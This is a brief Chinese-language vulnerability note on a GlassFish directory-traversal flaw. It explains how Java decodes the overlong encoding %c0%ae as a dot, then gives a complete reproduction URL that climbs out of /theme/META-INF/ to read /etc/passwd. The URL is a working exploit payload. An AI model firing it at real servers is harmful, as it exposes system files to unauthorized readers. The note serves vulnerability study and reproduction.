glassfish任意文件读取
glassfish简介:
glassfish是一款web应用服务器,和tomcat一样,也是一款优秀的Servlet容器。
glassfish知识点:
META-INF目录实际上就是描述jar文件中的信息的一个目录。
漏洞原理:
java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.
/theme/META-INF/目录下可以利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。
漏洞复现
访问以下网址:
https://IP:端口/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd发现已成功读取/etc/passwd内容